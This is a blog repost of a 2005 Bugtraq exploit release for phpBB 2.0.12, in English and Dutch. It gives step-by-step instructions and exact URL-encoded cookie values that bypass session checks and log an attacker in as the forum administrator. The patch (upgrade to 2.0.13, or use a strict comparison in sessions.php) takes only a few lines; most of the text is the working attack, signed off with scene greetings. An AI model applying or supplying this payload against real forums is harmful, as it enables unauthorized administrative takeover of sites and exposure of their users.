Exploit para phpBB 2.0.12

  • Post author:
  • Post category:Sem categoria

Este artigo foi retirado do newsletter do Security Focus.

phpBB 2.0.12 Session Handling Administrator Authentication Bypass -SIMPLIFIED- Inbox

Wesley aka PPC to bugtraq
More options Mar 4

———————————–

phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
– By PPC^Rebyte

———————————–

03maa2005

** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this exploit and has released a
‘critical update’ on 27 februari 2005, however most forums are still running
version 2.0.12 or lower.

VULNERABLE:
– 2.0.x –> 2.0.12

IMMUNE:
– 2.0.13 or newer

1* Intro
________

The discoverer of this bug is unknown, says “Paiserist” who wrote a C exploit
for this bug.

Link to Paisterist’s exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-exploits/phpbbsession.c

This program didn’t work as it should on my pc, so I had to find out a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fool around
with it until it eventually still doesn’t work (in my case).
This simplified manual method I’ll describe can also be used for Internet
Explorer or other browsers instead of only Mozilla/Firefox.

2* The bug
__________

We’re going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php
–> if( $sessiondata[‘autologinid’] == $auto_login_key )

3* Preparation
______________

1. Register at forum?

2. Log in with account
+ UNCHECK “Log in automatically”

3. Close browser to be sure a cookie is made.

4. Locate cookie
*firefox: X:\Documents and Settings\Name\Application
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
–> search the .txt for the domainname (domain.tld)
–> default cookiename = phpbbmysql
*iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]
–> default cookiename = phpbbmysql

4* Let’s Xploit!
________________

Open the cookie in a text editor and search a line that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

|
[ your ‘user id’ ] ____|

Replace this with:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

|
[ 2 = ‘user id’ of admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save cookie and close.
Open your browser and surf to forum.

You’ll now be automatically logged in having admin right 🙂

5* Solution
___________

* Update phpBB to version 2.0.13

– or –

* in “includes/sessions.php” replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata[‘autologinid’] == $auto_login_key )

replace with:

if( $sessiondata[‘autologinid’] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

— PPC^Rebyte —
[email protected]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[ NEDERLANDSE VERSIE ]

*** Status
__________

phpBB is ge?nformeerd over deze exploit en heeft een ‘critical update’
gelanceerd op 27 februari, maar de meeste forums draaien nog steeds op
versie 2.0.12 of lager.

KWETSBAAR:
– 2.0.x tot 2.0.12

IMMUUN:
– 2.0.13 of nieuwer

1* Intro
________

De ontdekker van de bug is onbekend, meldt “Paisterist” die een C exploit
heeft geschreven voor deze bug.

Link naar Paisterist’s exploit op Packetstormsecurity:
http://packetstormsecurity.org/0503-exploits/phpbbsession.c

Dit programma werkte voor geen klop op mijn pc, dus heb ik zelf een manier
gezocht, door middel van de exploit, om de bug handmatig te exploiteren.
Dit ging eigenlijk veel sneller dan de C exploit te moeten compileren
en ermee rond te moeten klungelen terwijl het uiteindelijk niet goed werkt
(in mijn geval).
De vereenvoudigde handmatige methode die ik omschrijf kan tevens gebruikt
worden voor Internet Explorer of andere browsers ipv alleen Firefox.

2* Werking
__________

We gaan een cookie zo aanpassen dat wanneer je een bepaald forum nog eens
bezoekt je ingelogd wordt met admin rechten door een bug in sessions.php
–> if( $sessiondata[‘autologinid’] == $auto_login_key )

3* Voorbereiding
________________

1. Eventueel Registreren op forum

2. Inloggen met account
+ Automatisch Inloggen UITVINKEN

3. Browser sluiten zodat er zeker een cookie wordt aangemaakt

4. Cookie lokaliseren
*bij firefox: X:\Documents and Settings\Name\Application
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
–> zoek in de .txt naar de domeinnaam (domain.tld)
–> standaard cookienaam = phpbbmysql
*bij iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]
–> standaard cookienaam = phpbbmysql

4* Let’s Xploit!
________________

Open de cookie in een teksteditor en zoek naar een lijn die gelijkt op:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

|
[ je ‘user id’ ] ____|

Vervang dit door:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

|
[ 2 = ‘user id’ van admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Cookie opslaan en sluiten.
Browser openen en naar forum surfen.

Normaal wordt je nu ingelogd met admin rechten 🙂

5* Oplossing
____________

* phpBB updaten naar 2.0.13

– of –

* in includes/sessions.php code vervangen:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata[‘autologinid’] == $auto_login_key )

vervangen door:

if( $sessiondata[‘autologinid’] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

6* Outro
________

THE.END

Greetings 2 everyone at Rebyte en de hele Belgische scene !!
Additional greetings 2 Paisterist voor de originele C exploit !

— PPC^Rebyte —
[email protected]